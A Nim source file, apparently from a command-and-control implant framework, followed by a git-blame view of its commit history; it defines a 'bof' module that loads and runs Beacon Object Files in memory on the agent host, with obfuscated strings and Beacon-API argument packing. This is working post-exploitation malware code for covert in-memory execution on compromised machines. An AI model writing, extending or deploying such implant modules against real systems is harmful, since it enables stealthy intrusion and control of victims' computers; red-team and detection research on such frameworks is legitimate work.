src/modules/bof.nim

import ../common/[types, utils]

# Define function prototype
proc executeBof(ctx: AgentCtx, task: Task): TaskResult 

# Module definition
let module* = Module(
    name: protect("bof"),
    description: protect("Load and execute BOF/COFF files in memory."),
    moduleType: MODULE_BOF,
    commands: @[
        Command(
            name: protect("bof"),
            commandType: CMD_BOF,
            description: protect("Execute an object file in memory and retrieve the output."),
            example: protect("bof /path/to/dir.x64.o C:\\Users"),
            arguments: @[
                Argument(name: protect("path"), description: protect("Path to the object file to execute."), argumentType: BINARY, isRequired: true),
                Argument(name: protect("arguments"), description: protect("Arguments to be passed to the object file. Arguments are handled as STRING, unless specified with a prefix ([i]:INT, [w]:WSTRING, [s]:SHORT; the colon separates prefix and value)"), argumentType: STRING, isRequired: false)
            ],
            execute: executeBof
        )
    ] 
)

# Implement execution functions
when not defined(agent):
    proc executeBof(ctx: AgentCtx, task: Task): TaskResult = nil

when defined(agent):

    import strformat
    import ../agent/core/coff
    import ../agent/utils/io
    import ../agent/protocol/result
    import ../common/serialize
    
    proc executeBof(ctx: AgentCtx, task: Task): TaskResult = 
        try: 
            var 
                objectFile: seq[byte] 
                arguments: seq[byte]

            # Parse arguments 
            case int(task.argCount): 
            of 1: # Only the object file has been passed as an argument
                objectFile = task.args[0].data
                arguments = @[]
            else: # Parameters were passed to the BOF execution
                objectFile = task.args[0].data

                # Combine the passed arguments into a format that is understood by the Beacon API
                arguments = generateCoffArguments(task.args[1..^1])
            
            # Unpacking object file, since it contains the file name too.
            var unpacker = Unpacker.init(Bytes.toString(objectFile))
            let 
                fileName = unpacker.getDataWithLengthPrefix()
                objectFileContents = unpacker.getDataWithLengthPrefix()

            print fmt"   [>] Executing object file {fileName}."
            let output = inlineExecuteGetOutput(string.toBytes(objectFileContents), arguments)

            if output != "":
                return createTaskResult(task, STATUS_COMPLETED, RESULT_STRING, string.toBytes(output))
            else: 
                return createTaskResult(task, STATUS_FAILED, RESULT_NO_OUTPUT, @[])

        except CatchableError as err: 
            return createTaskResult(task, STATUS_FAILED, RESULT_STRING, string.toBytes(err.msg))
Added 'bof' module for executing object files and fixed handling of optional arguments. 2025-08-29 15:58:26 +02:00			`import ../common/[types, utils]`

			`# Define function prototype`
			`proc executeBof(ctx: AgentCtx, task: Task): TaskResult`

Reworked module system. Modules can now be individually set to be included in the agent. For example, it is possible to compile an agent only capable of executing BOFs and nothing else. 2025-09-17 15:55:13 +02:00			`# Module definition`
			`let module* = Module(`
			`name: protect("bof"),`
			`description: protect("Load and execute BOF/COFF files in memory."),`
Improved module selection in payload generation modal with tooltips from the module manager. 2025-09-27 12:36:59 +02:00			`moduleType: MODULE_BOF,`
Reworked module system. Modules can now be individually set to be included in the agent. For example, it is possible to compile an agent only capable of executing BOFs and nothing else. 2025-09-17 15:55:13 +02:00			`commands: @[`
			`Command(`
			`name: protect("bof"),`
			`commandType: CMD_BOF,`
			`description: protect("Execute an object file in memory and retrieve the output."),`
			`example: protect("bof /path/to/dir.x64.o C:\\Users"),`
			`arguments: @[`
			`Argument(name: protect("path"), description: protect("Path to the object file to execute."), argumentType: BINARY, isRequired: true),`
			`Argument(name: protect("arguments"), description: protect("Arguments to be passed to the object file. Arguments are handled as STRING, unless specified with a prefix ([i]:INT, [w]:WSTRING, [s]:SHORT; the colon separates prefix and value)"), argumentType: STRING, isRequired: false)`
			`],`
			`execute: executeBof`
			`)`
			`]`
			`)`
Added 'bof' module for executing object files and fixed handling of optional arguments. 2025-08-29 15:58:26 +02:00
			`# Implement execution functions`
Improved module selection in payload generation modal with tooltips from the module manager. 2025-09-27 12:36:59 +02:00			`when not defined(agent):`
Added 'bof' module for executing object files and fixed handling of optional arguments. 2025-08-29 15:58:26 +02:00			`proc executeBof(ctx: AgentCtx, task: Task): TaskResult = nil`

			`when defined(agent):`

Removed warnings and unused imports. 2025-10-31 16:59:10 +01:00			`import strformat`
Updated directory structure and added simple 'exit' command to terminate an agent. 2025-10-23 17:28:07 +02:00			`import ../agent/core/coff`
			`import ../agent/utils/io`
Added 'bof' module for executing object files and fixed handling of optional arguments. 2025-08-29 15:58:26 +02:00			`import ../agent/protocol/result`
Removed warnings and unused imports. 2025-10-31 16:59:10 +01:00			`import ../common/serialize`
Added 'bof' module for executing object files and fixed handling of optional arguments. 2025-08-29 15:58:26 +02:00
			`proc executeBof(ctx: AgentCtx, task: Task): TaskResult =`
			`try:`
			`var`
			`objectFile: seq[byte]`
			`arguments: seq[byte]`

			`# Parse arguments`
			`case int(task.argCount):`
			`of 1: # Only the object file has been passed as an argument`
			`objectFile = task.args[0].data`
			`arguments = @[]`
Implemented handling of different argument types (int, wstring, short) for BOF files using specific prefixes. 2025-08-30 14:05:09 +02:00			`else: # Parameters were passed to the BOF execution`
Added 'bof' module for executing object files and fixed handling of optional arguments. 2025-08-29 15:58:26 +02:00			`objectFile = task.args[0].data`

			`# Combine the passed arguments into a format that is understood by the Beacon API`
			`arguments = generateCoffArguments(task.args[1..^1])`

Implemented simple upload command. 2025-09-01 20:27:00 +02:00			`# Unpacking object file, since it contains the file name too.`
			`var unpacker = Unpacker.init(Bytes.toString(objectFile))`
			`let`
			`fileName = unpacker.getDataWithLengthPrefix()`
			`objectFileContents = unpacker.getDataWithLengthPrefix()`

Implemented setting for verbose mode that prints debug messages in the windows where the agent is executed. Setting "verbose" to false disables all console output of the agent program. 2025-10-20 22:08:06 +02:00			`print fmt" [>] Executing object file {fileName}."`
Implemented simple upload command. 2025-09-01 20:27:00 +02:00			`let output = inlineExecuteGetOutput(string.toBytes(objectFileContents), arguments)`
Added 'bof' module for executing object files and fixed handling of optional arguments. 2025-08-29 15:58:26 +02:00
			`if output != "":`
			`return createTaskResult(task, STATUS_COMPLETED, RESULT_STRING, string.toBytes(output))`
			`else:`
			`return createTaskResult(task, STATUS_FAILED, RESULT_NO_OUTPUT, @[])`

			`except CatchableError as err:`
			`return createTaskResult(task, STATUS_FAILED, RESULT_STRING, string.toBytes(err.msg))`